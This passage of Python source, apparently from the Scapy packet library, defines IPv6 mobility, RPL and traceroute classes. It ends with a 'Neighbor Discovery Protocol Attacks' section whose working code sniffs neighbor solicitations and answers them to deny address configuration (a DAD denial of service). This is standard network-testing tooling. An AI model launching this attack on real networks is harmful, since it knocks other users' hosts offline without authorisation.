2762 cls = {0: ICMPv6NIQueryNOOP,
2763 2: ICMPv6NIQueryName,
2764 3: ICMPv6NIQueryIPv6,
2765 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer)
2766 elif type == 140: # Node Info Reply specific stuff
2767 code = orb(p[1])
2768 if code == 0:
2769 if len(p) > 6:
2770 qtype, = struct.unpack("!H", p[4:6])
2771 cls = {2: ICMPv6NIReplyName,
2772 3: ICMPv6NIReplyIPv6,
2773 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP)
2774 elif code == 1:
2775 cls = ICMPv6NIReplyRefuse
2776 elif code == 2:
2777 cls = ICMPv6NIReplyUnknown
2778 return cls
2779
2780
2781#############################################################################
2782#############################################################################
2783# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) #
2784#############################################################################
2785#############################################################################
2786
2787# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
2788rplcodes = {0: "DIS",
2789 1: "DIO",
2790 2: "DAO",
2791 3: "DAO-ACK",
2792 # 4: "P2P-DRO",
2793 # 5: "P2P-DRO-ACK",
2794 # 6: "Measurement",
2795 7: "DCO",
2796 8: "DCO-ACK"}
2797
2798
2799class ICMPv6RPL(_ICMPv6): # RFC 6550
2800 name = 'RPL'
2801 fields_desc = [ByteEnumField("type", 155, icmp6types),
2802 ByteEnumField("code", 0, rplcodes),
2803 XShortField("cksum", None)]
2804 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}
2805
2806
2807#############################################################################
2808#############################################################################
2809# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) #
2810#############################################################################
2811#############################################################################
2812
2813# Mobile IPv6 ICMPv6 related classes
2814
2815class ICMPv6HAADRequest(_ICMPv6):
2816 name = 'ICMPv6 Home Agent Address Discovery Request'
2817 fields_desc = [ByteEnumField("type", 144, icmp6types),
2818 ByteField("code", 0),
2819 XShortField("cksum", None),
2820 XShortField("id", None),
2821 BitEnumField("R", 1, 1, {1: 'MR'}),
2822 XBitField("res", 0, 15)]
2823
2824 def hashret(self):
2825 return struct.pack("!H", self.id) + self.payload.hashret()
2826
2827
2828class ICMPv6HAADReply(_ICMPv6):
2829 name = 'ICMPv6 Home Agent Address Discovery Reply'
2830 fields_desc = [ByteEnumField("type", 145, icmp6types),
2831 ByteField("code", 0),
2832 XShortField("cksum", None),
2833 XShortField("id", None),
2834 BitEnumField("R", 1, 1, {1: 'MR'}),
2835 XBitField("res", 0, 15),
2836 IP6ListField('addresses', None)]
2837
2838 def hashret(self):
2839 return struct.pack("!H", self.id) + self.payload.hashret()
2840
2841 def answers(self, other):
2842 if not isinstance(other, ICMPv6HAADRequest):
2843 return 0
2844 return self.id == other.id
2845
2846
2847class ICMPv6MPSol(_ICMPv6):
2848 name = 'ICMPv6 Mobile Prefix Solicitation'
2849 fields_desc = [ByteEnumField("type", 146, icmp6types),
2850 ByteField("code", 0),
2851 XShortField("cksum", None),
2852 XShortField("id", None),
2853 XShortField("res", 0)]
2854
2855 def _hashret(self):
2856 return struct.pack("!H", self.id)
2857
2858
2859class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
2860 name = 'ICMPv6 Mobile Prefix Advertisement'
2861 fields_desc = [ByteEnumField("type", 147, icmp6types),
2862 ByteField("code", 0),
2863 XShortField("cksum", None),
2864 XShortField("id", None),
2865 BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
2866 XBitField("res", 0, 14)]
2867
2868 def hashret(self):
2869 return struct.pack("!H", self.id)
2870
2871 def answers(self, other):
2872 return isinstance(other, ICMPv6MPSol)
2873
2874# Mobile IPv6 Options classes
2875
2876
2877_mobopttypes = {2: "Binding Refresh Advice",
2878 3: "Alternate Care-of Address",
2879 4: "Nonce Indices",
2880 5: "Binding Authorization Data",
2881 6: "Mobile Network Prefix (RFC3963)",
2882 7: "Link-Layer Address (RFC4068)",
2883 8: "Mobile Node Identifier (RFC4283)",
2884 9: "Mobility Message Authentication (RFC4285)",
2885 10: "Replay Protection (RFC4285)",
2886 11: "CGA Parameters Request (RFC4866)",
2887 12: "CGA Parameters (RFC4866)",
2888 13: "Signature (RFC4866)",
2889 14: "Home Keygen Token (RFC4866)",
2890 15: "Care-of Test Init (RFC4866)",
2891 16: "Care-of Test (RFC4866)"}
2892
2893
2894class _MIP6OptAlign(Packet):
2895 """ Mobile IPv6 options have alignment requirements of the form x*n+y.
2896 This class is inherited by all MIPv6 options to help in computing the
2897 required Padding for that option, i.e. the need for a Pad1 or PadN
2898 option before it. They only need to provide x and y as class
2899 parameters. (x=0 and y=0 are used when no alignment is required)"""
2900
2901 __slots__ = ["x", "y"]
2902
2903 def alignment_delta(self, curpos):
2904 x = self.x
2905 y = self.y
2906 if x == 0 and y == 0:
2907 return 0
2908 delta = x * ((curpos - y + x - 1) // x) + y - curpos
2909 return delta
2910
2911 def extract_padding(self, p):
2912 return b"", p
2913
2914
2915class MIP6OptBRAdvice(_MIP6OptAlign):
2916 name = 'Mobile IPv6 Option - Binding Refresh Advice'
2917 fields_desc = [ByteEnumField('otype', 2, _mobopttypes),
2918 ByteField('olen', 2),
2919 ShortField('rinter', 0)]
2920 x = 2
2921 y = 0 # alignment requirement: 2n
2922
2923
2924class MIP6OptAltCoA(_MIP6OptAlign):
2925 name = 'MIPv6 Option - Alternate Care-of Address'
2926 fields_desc = [ByteEnumField('otype', 3, _mobopttypes),
2927 ByteField('olen', 16),
2928 IP6Field("acoa", "::")]
2929 x = 8
2930 y = 6 # alignment requirement: 8n+6
2931
2932
2933class MIP6OptNonceIndices(_MIP6OptAlign):
2934 name = 'MIPv6 Option - Nonce Indices'
2935 fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
2936 ByteField('olen', 16),
2937 ShortField('hni', 0),
2938 ShortField('coni', 0)]
2939 x = 2
2940 y = 0 # alignment requirement: 2n
2941
2942
2943class MIP6OptBindingAuthData(_MIP6OptAlign):
2944 name = 'MIPv6 Option - Binding Authorization Data'
2945 fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
2946 ByteField('olen', 16),
2947 BitField('authenticator', 0, 96)]
2948 x = 8
2949 y = 2 # alignment requirement: 8n+2
2950
2951
2952class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963
2953 name = 'NEMO Option - Mobile Network Prefix'
2954 fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
2955 ByteField("olen", 18),
2956 ByteField("reserved", 0),
2957 ByteField("plen", 64),
2958 IP6Field("prefix", "::")]
2959 x = 8
2960 y = 4 # alignment requirement: 8n+4
2961
2962
2963class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068
2964 name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
2965 fields_desc = [ByteEnumField("otype", 7, _mobopttypes),
2966 ByteField("olen", 7),
2967 ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
2968 ByteField("pad", 0),
2969 MACField("lla", ETHER_ANY)] # Only support ethernet
2970 x = 0
2971 y = 0 # alignment requirement: none
2972
2973
2974class MIP6OptMNID(_MIP6OptAlign): # RFC 4283
2975 name = "MIPv6 Option - Mobile Node Identifier"
2976 fields_desc = [ByteEnumField("otype", 8, _mobopttypes),
2977 FieldLenField("olen", None, length_of="id", fmt="B",
2978 adjust=lambda pkt, x: x + 1),
2979 ByteEnumField("subtype", 1, {1: "NAI"}),
2980 StrLenField("id", "",
2981 length_from=lambda pkt: pkt.olen - 1)]
2982 x = 0
2983 y = 0 # alignment requirement: none
2984
2985# We only support decoding and basic build. Automatic HMAC computation is
2986# too much work for our current needs. It is left to the user (I mean ...
2987# you). --arno
2988
2989
2990class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5)
2991 name = "MIPv6 Option - Mobility Message Authentication"
2992 fields_desc = [ByteEnumField("otype", 9, _mobopttypes),
2993 FieldLenField("olen", None, length_of="authdata", fmt="B",
2994 adjust=lambda pkt, x: x + 5),
2995 ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501
2996 2: "MN-AAA authentication mobility option"}), # noqa: E501
2997 IntField("mspi", None),
2998 StrLenField("authdata", "A" * 12,
2999 length_from=lambda pkt: pkt.olen - 5)]
3000 x = 4
3001 y = 1 # alignment requirement: 4n+1
3002
3003# Extracted from RFC 1305 (NTP) :
3004# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
3005# in seconds relative to 0h on 1 January 1900. The integer part is in the
3006# first 32 bits and the fraction part in the last 32 bits.
3007
3008
3009class NTPTimestampField(LongField):
3010 def i2repr(self, pkt, x):
3011 if x < ((50 * 31536000) << 32):
3012 return "Some date a few decades ago (%d)" % x
3013
3014 # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
3015 # January 1st 1970 :
3016 delta = -2209075761
3017 i = int(x >> 32)
3018 j = float(x & 0xffffffff) * 2.0**-32
3019 res = i + j + delta
3020 t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))
3021
3022 return "%s (%d)" % (t, x)
3023
3024
3025class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6)
3026 name = "MIPv6 option - Replay Protection"
3027 fields_desc = [ByteEnumField("otype", 10, _mobopttypes),
3028 ByteField("olen", 8),
3029 NTPTimestampField("timestamp", 0)]
3030 x = 8
3031 y = 2 # alignment requirement: 8n+2
3032
3033
3034class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6)
3035 name = "MIPv6 option - CGA Parameters Request"
3036 fields_desc = [ByteEnumField("otype", 11, _mobopttypes),
3037 ByteField("olen", 0)]
3038 x = 0
3039 y = 0 # alignment requirement: none
3040
3041# XXX TODO: deal with CGA param fragmentation and build of defragmented
3042# XXX version. Passing of a big CGAParam structure should be
3043# XXX simplified. Make it hold packets, by the way --arno
3044
3045
3046class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1)
3047 name = "MIPv6 option - CGA Parameters"
3048 fields_desc = [ByteEnumField("otype", 12, _mobopttypes),
3049 FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
3050 StrLenField("cgaparams", "",
3051 length_from=lambda pkt: pkt.olen)]
3052 x = 0
3053 y = 0 # alignment requirement: none
3054
3055
3056class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2)
3057 name = "MIPv6 option - Signature"
3058 fields_desc = [ByteEnumField("otype", 13, _mobopttypes),
3059 FieldLenField("olen", None, length_of="sig", fmt="B"),
3060 StrLenField("sig", "",
3061 length_from=lambda pkt: pkt.olen)]
3062 x = 0
3063 y = 0 # alignment requirement: none
3064
3065
3066class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3)
3067 name = "MIPv6 option - Home Keygen Token"
3068 fields_desc = [ByteEnumField("otype", 14, _mobopttypes),
3069 FieldLenField("olen", None, length_of="hkt", fmt="B"),
3070 StrLenField("hkt", "",
3071 length_from=lambda pkt: pkt.olen)]
3072 x = 0
3073 y = 0 # alignment requirement: none
3074
3075
3076class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4)
3077 name = "MIPv6 option - Care-of Test Init"
3078 fields_desc = [ByteEnumField("otype", 15, _mobopttypes),
3079 ByteField("olen", 0)]
3080 x = 0
3081 y = 0 # alignment requirement: none
3082
3083
3084class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5)
3085 name = "MIPv6 option - Care-of Test"
3086 fields_desc = [ByteEnumField("otype", 16, _mobopttypes),
3087 FieldLenField("olen", None, length_of="cokt", fmt="B"),
3088 StrLenField("cokt", b'\x00' * 8,
3089 length_from=lambda pkt: pkt.olen)]
3090 x = 0
3091 y = 0 # alignment requirement: none
3092
3093
3094class MIP6OptUnknown(_MIP6OptAlign):
3095 name = 'Scapy6 - Unknown Mobility Option'
3096 fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
3097 FieldLenField("olen", None, length_of="odata", fmt="B"),
3098 StrLenField("odata", "",
3099 length_from=lambda pkt: pkt.olen)]
3100 x = 0
3101 y = 0 # alignment requirement: none
3102
3103 @classmethod
3104 def dispatch_hook(cls, _pkt=None, *_, **kargs):
3105 if _pkt:
3106 o = orb(_pkt[0]) # Option type
3107 if o in moboptcls:
3108 return moboptcls[o]
3109 return cls
3110
3111
3112moboptcls = {0: Pad1,
3113 1: PadN,
3114 2: MIP6OptBRAdvice,
3115 3: MIP6OptAltCoA,
3116 4: MIP6OptNonceIndices,
3117 5: MIP6OptBindingAuthData,
3118 6: MIP6OptMobNetPrefix,
3119 7: MIP6OptLLAddr,
3120 8: MIP6OptMNID,
3121 9: MIP6OptMsgAuth,
3122 10: MIP6OptReplayProtection,
3123 11: MIP6OptCGAParamsReq,
3124 12: MIP6OptCGAParams,
3125 13: MIP6OptSignature,
3126 14: MIP6OptHomeKeygenToken,
3127 15: MIP6OptCareOfTestInit,
3128 16: MIP6OptCareOfTest}
3129
3130
3131# Main Mobile IPv6 Classes
3132
3133mhtypes = {0: 'BRR',
3134 1: 'HoTI',
3135 2: 'CoTI',
3136 3: 'HoT',
3137 4: 'CoT',
3138 5: 'BU',
3139 6: 'BA',
3140 7: 'BE',
3141 8: 'Fast BU',
3142 9: 'Fast BA',
3143 10: 'Fast NA'}
3144
3145# From http://www.iana.org/assignments/mobility-parameters
3146bastatus = {0: 'Binding Update accepted',
3147 1: 'Accepted but prefix discovery necessary',
3148 128: 'Reason unspecified',
3149 129: 'Administratively prohibited',
3150 130: 'Insufficient resources',
3151 131: 'Home registration not supported',
3152 132: 'Not home subnet',
3153 133: 'Not home agent for this mobile node',
3154 134: 'Duplicate Address Detection failed',
3155 135: 'Sequence number out of window',
3156 136: 'Expired home nonce index',
3157 137: 'Expired care-of nonce index',
3158 138: 'Expired nonces',
3159 139: 'Registration type change disallowed',
3160 140: 'Mobile Router Operation not permitted',
3161 141: 'Invalid Prefix',
3162 142: 'Not Authorized for Prefix',
3163 143: 'Forwarding Setup failed (prefixes missing)',
3164 144: 'MIPV6-ID-MISMATCH',
3165 145: 'MIPV6-MESG-ID-REQD',
3166 146: 'MIPV6-AUTH-FAIL',
3167 147: 'Permanent home keygen token unavailable',
3168 148: 'CGA and signature verification failed',
3169 149: 'Permanent home keygen token exists',
3170 150: 'Non-null home nonce index expected'}
3171
3172
3173class _MobilityHeader(Packet):
3174 name = 'Dummy IPv6 Mobility Header'
3175 overload_fields = {IPv6: {"nh": 135}}
3176
3177 def post_build(self, p, pay):
3178 p += pay
3179 tmp_len = self.len
3180 if self.len is None:
3181 tmp_len = (len(p) - 8) // 8
3182 p = p[:1] + struct.pack("B", tmp_len) + p[2:]
3183 if self.cksum is None:
3184 cksum = in6_chksum(135, self.underlayer, p)
3185 else:
3186 cksum = self.cksum
3187 p = p[:4] + struct.pack("!H", cksum) + p[6:]
3188 return p
3189
3190
3191class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
3192 name = "IPv6 Mobility Header - Generic Message"
3193 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3194 ByteField("len", None),
3195 ByteEnumField("mhtype", None, mhtypes),
3196 ByteField("res", None),
3197 XShortField("cksum", None),
3198 StrLenField("msg", b"\x00" * 2,
3199 length_from=lambda pkt: 8 * pkt.len - 6)]
3200
3201
3202class MIP6MH_BRR(_MobilityHeader):
3203 name = "IPv6 Mobility Header - Binding Refresh Request"
3204 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3205 ByteField("len", None),
3206 ByteEnumField("mhtype", 0, mhtypes),
3207 ByteField("res", None),
3208 XShortField("cksum", None),
3209 ShortField("res2", None),
3210 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3211 _OptionsField("options", [], MIP6OptUnknown, 8,
3212 length_from=lambda pkt: 8 * pkt.len)]
3213 overload_fields = {IPv6: {"nh": 135}}
3214
3215 def hashret(self):
3216 # Hack: BRR, BU and BA have the same hashret that returns the same
3217 # value b"\x00\x08\x09" (concatenation of mhtypes). This is
3218 # because we need match BA with BU and BU with BRR. --arno
3219 return b"\x00\x08\x09"
3220
3221
3222class MIP6MH_HoTI(_MobilityHeader):
3223 name = "IPv6 Mobility Header - Home Test Init"
3224 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3225 ByteField("len", None),
3226 ByteEnumField("mhtype", 1, mhtypes),
3227 ByteField("res", None),
3228 XShortField("cksum", None),
3229 StrFixedLenField("reserved", b"\x00" * 2, 2),
3230 StrFixedLenField("cookie", b"\x00" * 8, 8),
3231 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3232 _OptionsField("options", [], MIP6OptUnknown, 16,
3233 length_from=lambda pkt: 8 * (pkt.len - 1))]
3234 overload_fields = {IPv6: {"nh": 135}}
3235
3236 def hashret(self):
3237 return bytes_encode(self.cookie)
3238
3239
3240class MIP6MH_CoTI(MIP6MH_HoTI):
3241 name = "IPv6 Mobility Header - Care-of Test Init"
3242 mhtype = 2
3243
3244 def hashret(self):
3245 return bytes_encode(self.cookie)
3246
3247
3248class MIP6MH_HoT(_MobilityHeader):
3249 name = "IPv6 Mobility Header - Home Test"
3250 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3251 ByteField("len", None),
3252 ByteEnumField("mhtype", 3, mhtypes),
3253 ByteField("res", None),
3254 XShortField("cksum", None),
3255 ShortField("index", None),
3256 StrFixedLenField("cookie", b"\x00" * 8, 8),
3257 StrFixedLenField("token", b"\x00" * 8, 8),
3258 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3259 _OptionsField("options", [], MIP6OptUnknown, 24,
3260 length_from=lambda pkt: 8 * (pkt.len - 2))]
3261 overload_fields = {IPv6: {"nh": 135}}
3262
3263 def hashret(self):
3264 return bytes_encode(self.cookie)
3265
3266 def answers(self, other):
3267 if (isinstance(other, MIP6MH_HoTI) and
3268 self.cookie == other.cookie):
3269 return 1
3270 return 0
3271
3272
3273class MIP6MH_CoT(MIP6MH_HoT):
3274 name = "IPv6 Mobility Header - Care-of Test"
3275 mhtype = 4
3276
3277 def hashret(self):
3278 return bytes_encode(self.cookie)
3279
3280 def answers(self, other):
3281 if (isinstance(other, MIP6MH_CoTI) and
3282 self.cookie == other.cookie):
3283 return 1
3284 return 0
3285
3286
3287class LifetimeField(ShortField):
3288 def i2repr(self, pkt, x):
3289 return "%d sec" % (4 * x)
3290
3291
3292class MIP6MH_BU(_MobilityHeader):
3293 name = "IPv6 Mobility Header - Binding Update"
3294 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3295 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3296 ByteEnumField("mhtype", 5, mhtypes),
3297 ByteField("res", None),
3298 XShortField("cksum", None),
3299 XShortField("seq", None), # TODO: ShortNonceField
3300 FlagsField("flags", "KHA", 7, "PRMKLHA"),
3301 XBitField("reserved", 0, 9),
3302 LifetimeField("mhtime", 3), # unit == 4 seconds
3303 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3304 _OptionsField("options", [], MIP6OptUnknown, 12,
3305 length_from=lambda pkt: 8 * pkt.len - 4)]
3306 overload_fields = {IPv6: {"nh": 135}}
3307
3308 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
3309 return b"\x00\x08\x09"
3310
3311 def answers(self, other):
3312 if isinstance(other, MIP6MH_BRR):
3313 return 1
3314 return 0
3315
3316
3317class MIP6MH_BA(_MobilityHeader):
3318 name = "IPv6 Mobility Header - Binding ACK"
3319 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3320 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3321 ByteEnumField("mhtype", 6, mhtypes),
3322 ByteField("res", None),
3323 XShortField("cksum", None),
3324 ByteEnumField("status", 0, bastatus),
3325 FlagsField("flags", "K", 3, "PRK"),
3326 XBitField("res2", None, 5),
3327 XShortField("seq", None), # TODO: ShortNonceField
3328 XShortField("mhtime", 0), # unit == 4 seconds
3329 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3330 _OptionsField("options", [], MIP6OptUnknown, 12,
3331 length_from=lambda pkt: 8 * pkt.len - 4)]
3332 overload_fields = {IPv6: {"nh": 135}}
3333
3334 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
3335 return b"\x00\x08\x09"
3336
3337 def answers(self, other):
3338 if (isinstance(other, MIP6MH_BU) and
3339 other.mhtype == 5 and
3340 self.mhtype == 6 and
3341 other.flags & 0x1 and # Ack request flags is set
3342 self.seq == other.seq):
3343 return 1
3344 return 0
3345
3346
3347_bestatus = {1: 'Unknown binding for Home Address destination option',
3348 2: 'Unrecognized MH Type value'}
3349
3350# TODO: match Binding Error to its stimulus
3351
3352
3353class MIP6MH_BE(_MobilityHeader):
3354 name = "IPv6 Mobility Header - Binding Error"
3355 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3356 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3357 ByteEnumField("mhtype", 7, mhtypes),
3358 ByteField("res", 0),
3359 XShortField("cksum", None),
3360 ByteEnumField("status", 0, _bestatus),
3361 ByteField("reserved", 0),
3362 IP6Field("ha", "::"),
3363 _OptionsField("options", [], MIP6OptUnknown, 24,
3364 length_from=lambda pkt: 8 * (pkt.len - 2))]
3365 overload_fields = {IPv6: {"nh": 135}}
3366
3367
3368_mip6_mhtype2cls = {0: MIP6MH_BRR,
3369 1: MIP6MH_HoTI,
3370 2: MIP6MH_CoTI,
3371 3: MIP6MH_HoT,
3372 4: MIP6MH_CoT,
3373 5: MIP6MH_BU,
3374 6: MIP6MH_BA,
3375 7: MIP6MH_BE}
3376
3377
3378#############################################################################
3379#############################################################################
3380# Traceroute6 #
3381#############################################################################
3382#############################################################################
3383
3384class AS_resolver6(AS_resolver_riswhois):
3385 def _resolve_one(self, ip):
3386 """
3387 overloaded version to provide a Whois resolution on the
3388 embedded IPv4 address if the address is 6to4 or Teredo.
3389 Otherwise, the native IPv6 address is passed.
3390 """
3391
3392 if in6_isaddr6to4(ip): # for 6to4, use embedded @
3393 tmp = inet_pton(socket.AF_INET6, ip)
3394 addr = inet_ntop(socket.AF_INET, tmp[2:6])
3395 elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
3396 addr = teredoAddrExtractInfo(ip)[2]
3397 else:
3398 addr = ip
3399
3400 _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
3401
3402 if asn.startswith("AS"):
3403 try:
3404 asn = int(asn[2:])
3405 except ValueError:
3406 pass
3407
3408 return ip, asn, desc
3409
3410
3411class TracerouteResult6(TracerouteResult):
3412 __slots__ = []
3413
3414 def show(self):
3415 return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501
3416 s.hlim,
3417 r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501
3418 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501
3419 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501
3420 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501
3421
3422 def get_trace(self):
3423 trace = {}
3424
3425 for s, r in self.res:
3426 if IPv6 not in s:
3427 continue
3428 d = s[IPv6].dst
3429 if d not in trace:
3430 trace[d] = {}
3431
3432 t = not (ICMPv6TimeExceeded in r or
3433 ICMPv6DestUnreach in r or
3434 ICMPv6PacketTooBig in r or
3435 ICMPv6ParamProblem in r)
3436
3437 trace[d][s[IPv6].hlim] = r[IPv6].src, t
3438
3439 for k in trace.values():
3440 try:
3441 m = min(x for x, y in k.items() if y[1])
3442 except ValueError:
3443 continue
3444 for li in list(k): # use list(): k is modified in the loop
3445 if li > m:
3446 del k[li]
3447
3448 return trace
3449
3450 def graph(self, ASres=AS_resolver6(), **kargs):
3451 TracerouteResult.graph(self, ASres=ASres, **kargs)
3452
3453
3454@conf.commands.register
3455def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
3456 l4=None, timeout=2, verbose=None, **kargs):
3457 """Instant TCP traceroute using IPv6
3458 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
3459 """
3460 if verbose is None:
3461 verbose = conf.verb
3462
3463 if l4 is None:
3464 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501
3465 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501
3466 else:
3467 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4,
3468 timeout=timeout, verbose=verbose, **kargs)
3469
3470 a = TracerouteResult6(a.res)
3471
3472 if verbose:
3473 a.show()
3474
3475 return a, b
3476
3477#############################################################################
3478#############################################################################
3479# Sockets #
3480#############################################################################
3481#############################################################################
3482
3483
3484if not WINDOWS:
3485 from scapy.supersocket import L3RawSocket
3486
3487 class L3RawSocket6(L3RawSocket):
3488 def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501
3489 # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501
3490 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501
3491 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501
3492 self.iface = iface
3493
3494
3495def IPv6inIP(dst='203.178.135.36', src=None):
3496 _IPv6inIP.dst = dst
3497 _IPv6inIP.src = src
3498 if not conf.L3socket == _IPv6inIP:
3499 _IPv6inIP.cls = conf.L3socket
3500 else:
3501 del conf.L3socket
3502 return _IPv6inIP
3503
3504
3505class _IPv6inIP(SuperSocket):
3506 dst = '127.0.0.1'
3507 src = None
3508 cls = None
3509
3510 def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501
3511 SuperSocket.__init__(self, family, type, proto)
3512 self.worker = self.cls(**args)
3513
3514 def set(self, dst, src=None):
3515 _IPv6inIP.src = src
3516 _IPv6inIP.dst = dst
3517
3518 def nonblock_recv(self):
3519 p = self.worker.nonblock_recv()
3520 return self._recv(p)
3521
3522 def recv(self, x):
3523 p = self.worker.recv(x)
3524 return self._recv(p, x)
3525
3526 def _recv(self, p, x=MTU):
3527 if p is None:
3528 return p
3529 elif isinstance(p, IP):
3530 # TODO: verify checksum
3531 if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
3532 if isinstance(p.payload, IPv6):
3533 return p.payload
3534 return p
3535
3536 def send(self, x):
3537 return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501
3538
3539
3540#############################################################################
3541#############################################################################
3542# Neighbor Discovery Protocol Attacks #
3543#############################################################################
3544#############################################################################
3545
3546def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
3547 tgt_filter=None, reply_mac=None):
3548 """
3549 Internal generic helper accepting a specific callback as first argument,
3550 for NS or NA reply. See the two specific functions below.
3551 """
3552
3553 def is_request(req, mac_src_filter, tgt_filter):
3554 """
3555 Check if packet req is a request
3556 """
3557
3558 # Those simple checks are based on Section 5.4.2 of RFC 4862
3559 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
3560 return 0
3561
3562 # Get and compare the MAC address
3563 mac_src = req[Ether].src
3564 if mac_src_filter and mac_src != mac_src_filter:
3565 return 0
3566
3567 # Source must be the unspecified address
3568 if req[IPv6].src != "::":
3569 return 0
3570
3571 # Check destination is the link-local solicited-node multicast
3572 # address associated with target address in received NS
3573 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
3574 if tgt_filter and tgt != tgt_filter:
3575 return 0
3576 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
3577 expected_snma = in6_getnsma(tgt)
3578 if received_snma != expected_snma:
3579 return 0
3580
3581 return 1
3582
3583 if not iface:
3584 iface = conf.iface
3585
3586 # To prevent sniffing our own traffic
3587 if not reply_mac:
3588 reply_mac = get_if_hwaddr(iface)
3589 sniff_filter = "icmp6 and not ether src %s" % reply_mac
3590
3591 sniff(store=0,
3592 filter=sniff_filter,
3593 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
3594 prn=lambda x: reply_callback(x, reply_mac, iface),
3595 iface=iface)
3596
3597
3598def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
3599 reply_mac=None):
3600 """
3601 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3602 3756. This is done by listening incoming NS messages sent from the
3603 unspecified address and sending a NS reply for the target address,
3604 leading the peer to believe that another node is also performing DAD
3605 for that address.
3606
3607 By default, the fake NS sent to create the DoS uses:
3608 - as target address the target address found in received NS.
3609 - as IPv6 source address: the unspecified address (::).
3610 - as IPv6 destination address: the link-local solicited-node multicast
3611 address derived from the target address in received NS.
3612 - the mac address of the interface as source (or reply_mac, see below).
3613 - the multicast mac address derived from the solicited node multicast
3614 address used as IPv6 destination address.
3615
3616 Following arguments can be used to change the behavior:
3617
3618 iface: a specific interface (e.g. "eth0") of the system on which the
3619 DoS should be launched. If None is provided conf.iface is used.
3620
3621 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3622 Only NS messages received from this source will trigger replies.
3623 This allows limiting the effects of the DoS to a single target by
3624 filtering on its mac address. The default value is None: the DoS
3625 is not limited to a specific mac address.
3626
